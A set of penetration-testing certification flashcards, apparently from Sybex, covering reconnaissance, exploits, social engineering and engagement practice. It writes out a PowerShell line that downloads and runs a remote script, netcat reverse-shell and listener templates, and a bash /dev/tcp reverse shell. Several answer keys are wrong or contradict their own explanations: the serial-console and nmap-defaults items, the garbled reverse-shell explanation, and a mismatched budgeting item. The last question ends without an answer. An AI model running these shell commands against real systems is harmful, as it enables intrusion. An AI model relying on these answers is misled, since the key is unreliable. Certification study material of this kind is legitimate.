Sybex Flashcards
Which of the following is a mechanism that can be used to defend against DNS poisoning attacks?
- Implement DNSSEC.
- Close port 53 in the DNS server’s host firewall.
- Disable ICMP forwarding in your router configuration.
- Use SSH for DNS queries.
- A. One way to defend against DNS poisoning is to implement DNSSEC. DNSSEC signs each DNS request with a digital signature to ensure authenticity. This makes it difficult to insert poisoned records.
You are a penetration tester, and you are conducting a test for a new client. You have successfully exploited a DM2 server that seems to be listening to an outbound port. You want to forward that traffic back to a device. What are the best tools to do this? (Choose two.)
A. Cain and Abel
B. Netcat
C. Nmap
D. Secure Shell (SSH)
E. Tcpdump
F. Wireshark
- D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.
You are a penetration tester, and you are conducting a test for a new client. The client has asked you to conduct a test on a web application. You discover that the user login process sends form field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent using which method?
A. The HTTP OPTIONS method
B. The HTTP POST method
C. The HTTP PUT method
D. The HTTP TRACE method
- B. Forms in HTML can use either method=”POST” or method=”GET” (default) in the element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, the parameters are not saved in browser history. GET is less secure compared to POST.
Which of the following best describes the term confidentiality within the context of penetration testing?
A. Preventing unauthorized access to information
B. Preventing unauthorized modifications to information
C. Ensuring information remains available for authorized access
D. Preventing legitimate access to information
- A. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter C in CIA stands for confidentiality, which seeks to prevent unauthorized access to information or systems.
Which social engineering technique involves questioning an employee using intimidation to gather information?
- Phishing
- Smishing
- Impersonation
- Interrogation
- D. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers.
A penetration tester is conducting a test on a web application and discovers that the user login process sends FROM field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent by using which of the following?
- The HTTP OPTIONS method
- The HTTP POST method
- The HTTP PUT method
- The HTTP TRACE method
- B. Forms in HTML can use either method=”POST” or method=”GET” (default) in the element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, parameters are not saved in browser history. GET is less secure compared to POST because data sent is part of the URL.
An attacker downloads the Low Orbit Ion Cannon from the Internet and then uses it to conduct a denial-of-service attack against a former employer’s website. What kind of attacker is this?
A. Script kiddie
B. Hacktivist
C. Organized crime
D. Nation-state
- A. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated. Organized crime actors are usually a highly organized group of cybercriminals whose main goal is to make a lot of money. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.
Which of the following are special network devices that are commonly used to control manufacturing equipment and environmental systems? (Choose two.)
- ICS
- SCADA
- Point of sale
- RTOS
- IoT
- A and B. Industrial control systems (ICSs) and supervisory control and data acquisition (SCADA) are commonly used in factory automation equipment and environmental controls. They tend to run on older operating systems, and their software/firmware tends to be updated very infrequently. This can make such systems more susceptible to security exploits. They are also usually quite fragile, so use caution when scanning them with a vulnerability scanner.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
A. Use only hardware certified by Microsoft to be Windows 10–compatible.
B. Encrypt the transmission of cardholder data.
C. Ensure that only one user account is used by all employees to access network resources and cardholder data.
D. Use a NAT router to isolate the cardholder data environment (CDE) from the rest of the network.
E. Remove all default passwords from software and hardware devices.
- B and E. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that all cardholder data be encrypted before being transmitted on a network medium and that all default passwords be removed from hardware and software deployed.
During a penetration test, you discover that your client uses a web application that was developed in-house that stores user passwords as clear text within a MySQL database. What should you recommend?
A. Purchase a commercial application that performs a similar task.
B. Rewrite the application to encrypt passwords before they are saved in the database.
C. Switch to the PostgreSQL database.
D. Switch to a hosted solution with a cloud service provider.
- B. Because the application was developed in-house, the client should be able to rewrite the code such that passwords are encrypted by the application before they are saved in the database.
Which of the following is an XML-based interface definition language used to describe the functionality offered by a Simple Object Access Protocol (SOAP) server?
A. Web Service Description Language (WSDL)
B. Web Application Description Language (WADL)
C. Representational State Transfer (REST)
D. Swagger
- A. The Web Service Description Language (WSDL) is an XML-based interface definition language that is used to describe the functionality offered by a web application server, such as a SOAP server. WSDL doesn’t work well with the Representational State Transfer (REST) web application architecture, which has been slowly replacing SOAP over the years.
Which of the following tools can be used to automatically run tasks on a Windows system without your intervention? (Choose two.)
- WMI
- at
- Task Scheduler
- PS remoting
- cron
- B and C. In the graphical environment, you can use Task Scheduler to automatically run tasks (such as exploits executables or services) without your intervention. You can also use the at command from the command prompt to accomplish the same thing.
Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?
A. Attestation of findings
B. Normalization of data
C. Remediation
D. Disposition of reports
- B. When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and easy to understand.
A security analyst is planning on using black box penetration testing. This type of strategy will provide the tester with which of the following?
A. Privileged credentials
B. A network diagram
C. Source code
D. Nothing; they must do their own discovery.
- D. Black box tests, sometimes called zero knowledge tests, are intended to replicate what an attacker would encounter. Testers are not provided with access to or information about an environment, and instead, they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems as an attacker would.
You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. They also might filter out any messages that contain high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?
A. Measurement
B. People
C. Process
D. Technology
- D. In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.
Which of the following is a service that runs on a Windows system and enforces the security policy of the system?
- LSASS
- Key distribution center (KDC)
- Group Policy Object (GPO)
- LDAP
- A. The Local Security Authority Subsystem Service (LSASS) is a process that runs on a Windows system to enforce the security policy on the system. It verifies users that log on to the system, manages user password changes, creates access tokens, and makes entries to the Security log.
You’ve heard that a new physical security exploit is going around where the attacker uses a special type of key called a bump key. Which open source research source would most likely contain information about how this exploit works?
- CAPEC
- Full Disclosure
- NVD
- CVE
- A. The CAPEC database contains information about known attack patterns used to exploit weaknesses, including physical security vulnerabilities.
You are a penetration tester, and you are conducting a test for a new client. You are looking to start a session hijacking attack against your client’s web application. What information is important to obtain to ensure that your attack will be a success?
A. A session cookie
B. A session ticket
C. A username
D. A user password
- A. Websites use HTTP cookies to keep sessions over time. If a tester is able to get a copy of the user’s session cookie, then they can use that cookie to impersonate the user’s browser and hijack the authenticated session. Attackers who are able to acquire the session cookie used to authenticate a user’s web session can hijack that session and take charge of the user’s account. Cookies used for authentication should always be securely created and transmitted only over secure, encrypted communications channels.
You’re prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 10. To which risk category does this vulnerability belong?
- Low
- Medium
- High
- Critical
- D. Any CVSS score of 10.0 or higher is considered to be in the Critical Risk category. Therefore, a CVSS score of 10 indicates that this is a critical vulnerability.
You own a small penetration testing consulting firm. You are worried that a client who requests a black box assessment may sue you after penetration testing is complete if their network is compromised by an exploit. What should you do?
A. Insist that clients sign a purchase order prior to the test.
B. Insist that clients sign a master services agreement (MSA) prior to the test.
C. Include a disclaimer in the agreement indicating that the test methodology can impact the comprehensiveness of the test.
D. Refuse to perform black box tests.
- C. The testing agreement or scope documentation should contain a disclaimer explaining that the scope and methodology requested by the client can impact the comprehensiveness of the test. For example, a white box test is more likely to discover hidden vulnerabilities than a black box test can. A purchase order is a binding agreement to purchase goods or services. An MSA is an agreement that defines terms that will govern future agreements. Black box tests can provide a unique perspective and should not be forsaken.
You are a penetration tester, and you are conducting a penetration test for a new client. You are looking to cross-compile code for your penetration activity, and then you plan to deploy it. Why would you plan to cross-compile code?
A. To add additional libraries
B. To allow you to inspect the source code
C. To run it on multiple platforms
D. To run it on different architectures
- D. Cross-compiling code is used when a target platform is on a different architecture. The tester may not have access to a compiler on the target machine or may need to compile the code for an exploit from the primary workstation, which is not the same architecture as the target.
Which of the following is a contract where both parties agree to most of the terms that will govern future agreements?
A. Master service agreement (MSA)
B. Nondisclosure agreement (NDA)
C. Statement of work (SOW)
D. Purchase order (PO)
- A. A master service agreement (MSA) is a contract where both parties agree to most of the terms that will govern future agreements. By defining these terms in an MSA, future agreements are much easier and faster to make. A purchase order is a binding agreement to make a purchase from a vendor. A SOW is a formal document that defines the scope of a penetration test. An NDA specifies what each party in an agreement is allowed to disclose to third parties.
Which open source research source is published by the organization that produces the nmap utility?
- CERT
- Full Disclosure
- CVE
- NVD
- B. Full Disclosure is an open source research source that is published by the same organization that produces the nmap utility. It can be accessed at www.seclists.org/fulldisclosure.
You are a penetration tester, and you are conducting a test for a new client. You have been asked to assess your client’s physical security by gaining access into the corporate office. You are looking for a method that will allow you to enter the building during both business hours and after hours. What would be the most effective method for you to attempt?
A. Attempt badge cloning.
B. Attempt lock picking.
C. Attempt a lock bypass.
D. Attempt piggybacking.
- A. With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
A. Escape data.
B. Implement SSL for network communications.
C. Require 2FA when authenticating users.
D. Salt the hash.
- A. In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.
You are a penetration tester and are discussing with a client the properties of the testing engagement agreement. Which one of the following will have the biggest impact on the observation and testing of the client’s production systems during their peak loads?
- Creating a scope of the critical production systems used by the client
- Establishing a white box testing engagement with the client
- Having the client’s management team sign off on any invasive testing
- Setting up a schedule of testing times to access their systems
- D. The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.
In terms of multifactor authentication, which of the following is an example of somewhere you are?
A. Security token generator
B. Passphrase
C. Hardwire connection to the organization’s internal LAN
D. Voiceprint
- C. A hardwire connection to an organization’s internal LAN is an example of somewhere you are. Authentication may or may not be allowed based on this factor.
As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.)
A. whois
B. Metasploit Framework
C. OpenVAS
D. nslookup
E. Nessus
- A and D. The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.
Which port is used by the SNMP protocol?
- UDP 161
- TCP 23
- TCP 389
- UDP 88
- A. The SNMP protocol runs on UDP port 161.
During a penetration test, the tester gains physical access to a Windows server system and reboots it from a flash drive that has a Linux distribution installed on it. She is able to bypass security and copy key files from the server to the flash drive for later cracking and analysis. What type of exploit occurred in this scenario?
- Cold boot attack
- Shell upgrade exploit
- VM escape exploit
- JTAG debug exploit
- A. The tester implemented a cold boot attack. By booting to Linux from the flash drive, she was able to bypass many of the Windows security mechanisms and access key files.
The network administrator for an organization that is the target of a penetration test configured her network firewall with an administrative username of admin and a password of password. Which authentication exploit is this device vulnerable to?
- Weak credentials exploit
- Redirect attack
- Session hijacking
- Kerberos exploit
- A. This device is vulnerable to a weak credentials exploit because the administrative username and password are easy to guess.
A penetration tester is using PowerShell to conduct testing. The tester is using the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-Command
What action is being performed by this command?
A. It executes a remote script.
B. It incorporates an object.
C. It runs an encoded command.
D. It sets the execution policy.
- A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.
You are a penetration tester, and you have heard about an attacker who carried out an attack against a government contractor in a neighboring country. The goal of the attack was to gain access through the contractor to the opposing country’s government network infrastructure. The attacker is being backed by the attacker’s own government. What type of threat actor is being described in this scenario?
A. Hacktivist
B. Nation state
C. Organized crime
D. Script kiddie
- B. A nation state threat actor has been given the “go ahead” to hack. They work for a government to disrupt or compromise target governments, organizations, or individuals to gain access to valuable data or intelligence and can create incidents that have international significance. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist usually attacks targets to make a political statement. An organized crime threat actor is a group of cybercriminals whose goal is financial gain.
Which of the following can be used to perform brute-force password attacks? (Choose two.)
A. Empire
B. Patator
C. Powersploit
D. Aircrack-ng
E. APK Studio
- B and D. Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.
An attacker carries out an attack against a government contractor in a neighboring country, with the goal of gaining access through the contractor to the rival country’s governmental network infrastructure. The government of the attacker’s own country is directing and funding the attack. What type of threat actor is this?
A. Script kiddie
B. Hacktivist
C. Organized crime
D. Nation-state
- D. A state-sponsored attacker usually operates under the direction of a government agency. The attacks are usually aimed at government contractors or even the government systems themselves. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain.
You are a penetration tester, and you want to use nmap to scan a remote system. You will be using the following command:
nmap 142.78.32.0/24
How many TCP ports will you be scanning?
A. 256
B. 1,000
C. 1,024
D. 65,535
- B. Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1–65,535.
A penetration tester is conducting a scan of a web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation?
- Clickjacking
- Expired certificate
- Fill path disclosure
- Stored cross-site scripting (XSS)
- D. Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user which might be malicious and then stores that input in a data store for later use
Consider the following image:
Which nmap command could have been used to generate this output?
A. nmap 10.0.0.1
B. nmap 10.0.0.1 -sS
C. nmap 10.0.0.1 -sU
D. nmap 10.0.0.1 -sT
- C. In this example, the nmap utility was used to run a UDP scan. The nmap 10.0.0.1 –sU command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan; however, it lists UDP ports instead of TCP ports.
You are a penetration tester, and you are configuring your vulnerability management solution to perform credentialed scans of servers on your client’s network. What type of account should you be provided with?
A. A domain administrator account
B. A local administrator account
C. A domain guest account
D. A read-only account
- D. Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity.
Which utility is used to conduct social engineering exploits?
A. Responder
B. SET
C. APKX
D. Immunity debugger
E. Hopper
- B. The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.
You are assessing the results of a vulnerability scan and have made an observation. You have found that the organization has many Linux servers deployed that still run on a distribution that was released in 2008. What should you do?
- Map vulnerabilities present in the older Linux servers to possible exploits.
- Halt the penetration test and inform the client immediately.
- Recommend that the client upgrade the servers in an email.
- Upgrade the servers for your client.
- A. The first response to your observation of outdated servers would to be to investigate whether this creates any vulnerabilities that you could exploit later in your penetration test. Then, you should recommend that the client upgrade their server in your final report.
You’re prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 3.8. To which risk category does this vulnerability belong?
- Low
- Medium
- High
- Critical
- A. Any CVSS score less than 4.0 is considered to be in the Low Risk category. Therefore, a CVSS score of 3.8 indicates that this is a low-risk vulnerability.
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send phishing emails to users within the organization. What is this exploit called?
- Distributed denial of service
- SMTP relay
- Fraggle
- Teardrop
- B. Leveraging an open SMTP service to send unauthorized email messages is called SMTP relay. Most new systems have provisions in place to prevent this from happening, but many older server systems do not.
Consider the following snippet from a script:
If (x -eq 2) {
‘This number is 2’
} Else {
‘This number is not 2’
}
What scripting language is this snippet written in?
A. Ruby
B. PowerShell
C. Bash
D. Python
- B. An if/then flow control structure in PowerShell uses the following syntax:
- if condition {
- commands…
- } Else {
- commands…
- }
A penetration tester has completed a simple compliance scan of a client’s network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that was given to the tester prior to testing. What is most likely the cause for the discrepancy? (Choose two.)
- A misconfigured DHCP server
- Incorrect credentials
- Limited network access
- Network access controls (NAC)
- Storage access
- C and E. Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.
You are generating a written report of findings after a penetration test. In which section should you report risk ratings?
A. Executive summary
B. Methodology
C. Findings and remediation
D. Metrics and measures
E. Conclusion
- D. When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.
A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn’t know which systems on the network may accept the hash. What tool should the tester use to conduct the test?
A. Drozer
B. Hashcat
C. Hydra
D. Kismet
- C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.
You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. The system you want to target can’t be compromised with a single exploit. However, you determine that you can use multiple exploits in conjunction with each other to compromise the system. The first one gets through the system’s host-based firewall. The second exploits a user account with weak password. The third elevates privileges on the system. What is your solution called?
- Deception
- Exploit modification
- Exploit chaining
- Credential brute-forcing
- Proof-of-concept development
- C. In this scenario, you linked several exploits together to compromise the target system. This is called exploit chaining.
Which Linux special permission, when assigned to a directory, prevents users from deleting files they do not own, even if they have write and execute permissions to the directory?
- SGID
- SUID
- Sticky bit
- Ret2libc
- C. When the sticky bit permission is assigned to a directory on a Linux system, then users can delete files only within the directory for which they are the owner, even if they have write and execute permissions to that directory.
Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?
A. Enforce password history
B. Minimum password length
C. Minimum password age
D. Maximum password age
- D. The “Maximum password age” Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.
You are a penetration tester, and you are conducting a test for a new client. During a gray box penetration test you want to be able to set up a bind shell exploit where a listener is set up on a compromised system on the client’s network. Which remote access tools can you use to do this? (Choose two.)
A. Empire
B. Ncat
C. Netcat
D. Powersploit
E. Searchsploit
- B and C. Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh
- Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe
- It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port]
- Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.
You are performing a gray box penetration test. You want to craft a custom packet to test how a server responds and to see what information it responds with. Which utility could you use to do this?
- hping
- ping
- nmap
- Wireshark
- A. The hping utility is a tool commonly used by penetration testers for packet crafting. It allows you to make almost any kind of packet you want and send it to a designated host on the target network. Analyzing how the host responds can provide you with valuable information for the next phase of the penetration test.
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target’s facility and attempt to capture data from its wireless network. You are parked in the organization’s parking lot. You want to use aircrack-ng to crack the encryption used by the Wi-Fi network. To accomplish this, you first need to capture the authentication handshake. Which utility should you run on your laptop to do this?
- airodump-ng
- aireplay-ng
- aircrack-ng
- nmap
- A. Before Aircrack-ng can be used to crack the encryption on a wireless network, you must first run the airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake.
You are a penetration tester, and you have been asked by a client to perform a code review of their web application. What type of analysis will you be performing?
A. Dynamic code analysis
B. Fuzzing
C. Fault injection
D. Static code analysis
- D. Code testing is often done using static or dynamic code analysis along with testing methods such as fuzzing and fault injection. Once changes are made to the code and it is deployed, it must be retested to ensure that the changes didn’t create any new security issues. Since you are only reviewing the code in this scenario, you will be conducting a static code analysis. Static code analysis, also known as source code analysis, is done by reviewing the code of an application. Since static analysis uses the source code, it can be seen as a type of white box testing with full visibility. This can allow testers to find problems that other tests might fail to spot.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization’s servers and discover that port 143 is open. What does this indicate?
- It is an LDAP server.
- It is a POP3 email server.
- It is an SSH server.
- It is an IMAP email server.
- D. The default port used by the IMAP service is 143. The IMAP protocol is used by email servers to transfer messages between the mail server and mail clients.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an internal penetration testing team consisting of your own employees. Which of the following are benefits of using an internal team? (Choose two.)
A. They have contextual knowledge of the organization.
B. They are less biased than an external contractor.
C. They have the independence required to perform a thorough test.
D. They have in-depth experience performing penetration tests for many organizations.
E. It’s usually less expensive than using an external contractor.
- A and E. There are two major benefits of using internal teams to conduct penetration tests. First, they have contextual knowledge of the organization that can improve the effectiveness of the tests. Second, it’s usually less expensive to conduct testing using internal employees than it is to hire a penetration testing contractor. When the internal staff isn’t involved in a penetration test, they can work on other projects for the organization.
You are a performance tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration?
A. Any additional rates
B. Any company policies
C. The industry type
D. The impact tolerance
- A. Budgeting is a key factor of the business process of penetration testing. A budget is required to complete a penetration test and is determined by the scope of the test and the rules of engagement. For internal penetration testers, a budget may just involve the allotted time for the team to perform testing. For external testers, a budget usually starts with the estimated number of hours based on the intricacy of the testing, the size of the team, and any associated costs.
You are performing a black box penetration test for a small organization that wholesales imported electronic devices in the United States. You have used reconnaissance techniques to identify a receptionist’s phone number as well as the organization’s printer vendor. You call this receptionist, pretending to be a sales rep from the vendor. You ask the receptionist for information about their printers, workstations, operating systems, and so on, to learn more about the organization’s network infrastructure. What kind of exploit did you use in this scenario?
- Smishing
- Vishing
- Spear phishing
- Whaling
- B. A voice phishing attack (also called a vishing attack) was used in this scenario. A vishing attack leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.
You are a penetration tester, and you have just completed a simple compliance scan of your client’s network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that you were given prior to testing. What is most likely the cause for the discrepancy? (Choose two.)
A. A misconfigured DHCP server
B. Incorrect credentials
C. Limited network access
D. Network access controls (NAC)
E. Storage access
- C and E. Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.
Which of the following application scanning techniques is performed by sending random, unexpected, or invalid data to the inputs of an application to see how it responds?
- Static code analysis
- Fuzzing
- Source code analysis
- None of the above
- B. Fuzz testing involves sending random, unexpected, or invalid data to the inputs of an application to test how it handles that data. This is called exception handling. Many attacks can be deployed that exploit an application’s inability to properly handle unexpected data.
Which of the following methods is commonly used to harden Linux-based server systems?
A. Enable the Telnet service.
B. Enable the secure shell (SSH) service.
C. Configure the IP protocol to respond to network broadcasts.
D. Enable user accounts with empty passwords.
- B. To harden a Linux-based server system, you should make sure you use SSH instead of Telnet for remote access to the system. SSH encrypts all network traffic between the SSH server and the SSH client. Telnet, on the other hand, transmits all data as clear text, including authentication credentials.
A team of testers is conducting an assessment for an organization. The team is not concerned with assessing a broad range of vulnerabilities. Instead, they are conducting a coordinated attack governed by very narrow objectives. The rules of engagement specify that they can use physical, electronic, and social exploits to achieve their objective. What kind of penetration test is happening in this scenario?
A. Compliance-based penetration test
B. White box penetration test
C. Gray box penetration test
D. Black box penetration test
E. Red team penetration test
- E. In this scenario, a red team penetration test is being conducted. A red team assessment usually has narrow objectives, rather than trying to comprehensively identify and test all possible vulnerabilities. A red team assessment may use a coordinated attack coming from many different vectors to achieve those objectives. The team may be allowed to use a wide variety of tools and techniques to accomplish this, including technological, physical, and social exploits.
Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point?
- Repeating attack
- Downgrade attack
- Deauth attack
- Fragmentation attack
- D. In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.
Consider the following image:
Which nmap command could have been used to generate this output?
A. nmap 10.0.0.1 -sA
B. nmap 10.0.0.1 -sS
C. nmap 10.0.0.1 -sU
D. nmap 10.0.0.1 -sT
- A. In this example, the nmap utility was used to run a TCP ACK port scan. The nmap 10.0.0.1 –sA command can be used to run this kind of scan.
What are the risks of enabling serial console connections on network devices such as routers and switches?
- Network administrators tend to not secure them properly.
- They are prone to data emanation.
- It is easy for attackers to connect to them.
- It is easy for attackers to sniff data from them.
- B. The risk associated with enabled serial console connections on network devices is the fact that network administrators tend to not secure them properly. Because they can be accessed only with a direct point-to-point connection, they don’t configure them to require authentication. Using impersonation, this makes it easy for a penetration tester to access the device, as long as they can get physical access to it.
You and a colleague are discussing open-source intelligence (OSINT), and the discussion leans toward discussing vulnerabilities and other security flaws. There are a number of organizations that work to centralize this knowledge. One of these organizations tackles a broad range of cybersecurity activities. It focuses on security breach and denial-of-service (DoS) incidents by providing alerts, as well as incident-handling and avoidance guidelines. What organization is being discussed?
A. The Common Attack Pattern Enumeration and Classification (CAPEC)
B. Computer Emergency Response Team (CERT)
C. Common Weakness Enumeration (CWE)
D. National Institute of Standards and Technology (NIST)
- B. A Computer Emergency Response Team (CERT) focuses on security breach and denial-of-service incidents, providing alerts and incident-handling and avoidance guidelines. CERT also conducts an ongoing public awareness campaign and engages in research aimed at improving security systems.
As part of a gray box penetration test, you need to capture packets on a wired network. How must the wired network interface in your laptop be configured to accomplish this?
- Set to monitor mode.
- Set to promiscuous mode.
- Set to capture mode.
- Set to IEEE 802.1x mode.
- B. Before you can capture packets on a wired network, your network interface must be configured to run in promiscuous mode. Otherwise, it will discard all frames it receives that are not addressed specifically to its address.
You are a penetration tester, and you have just completed testing for a new client. You are conducting the post-engagement cleanup process. What should you do during the post-engagement cleanup process? (Choose two.)
A. You want to make sure to remove any shell sessions that you created during the testing.
B. You want to make sure to hide everything you did during the testing from the client.
C. You want to make sure to document everything you did during the testing.
D. You want to hide everything you did during the clean up after the testing.
- A and C. After a penetration test, it is imperative that you undo everything you have done to your client’s network. So, if you have created any shells, they need to be removed. It is also important to document everything you’ve done while conducting the testing. That way, you don’t accidentally forget something. The goal is to put everything the way it was prior to your testing.
You are a penetration tester, and you are conducting a test for a new client. You want to do a search to see whether your client’s computers and devices are connected to the Internet and to see whether their geoIP information is available. What tool can you use to accomplish this?
A. Censys
B. Shodan
C. TheHarvester
D. Whois
- A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.
Which Linux exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a process’s’ memory?
- SGID
- Sticky bit
- Ret2libc
- Unsecure sudo
- C. On Linux system, the Ret2libc exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a processes’ memory.
A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use?
A. bash -i >& /dev/tcp//443 0>&1
B. nc -e /bin/sh 443
C. perl -e ‘use SOCKET’; $i=’; $p=’443;
D. ssh superadmin@ -p 443
- A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following:
- bash -i >& /dev/tcp//443 0>&1
- Given the options, A is the best option. B and C will not work because they are using the and not the . Option D is not correct because it is using the improper syntax.
You are a penetration tester, and you are conducting a test for a new client. You are attempting a physical security assessment, and you want to use an “under-the-door-tool” during the test. Which of the following intrusion techniques should you use?
A. Egress sensor triggering
B. Lock bumping
C. Lock bypass
D. Lock picking
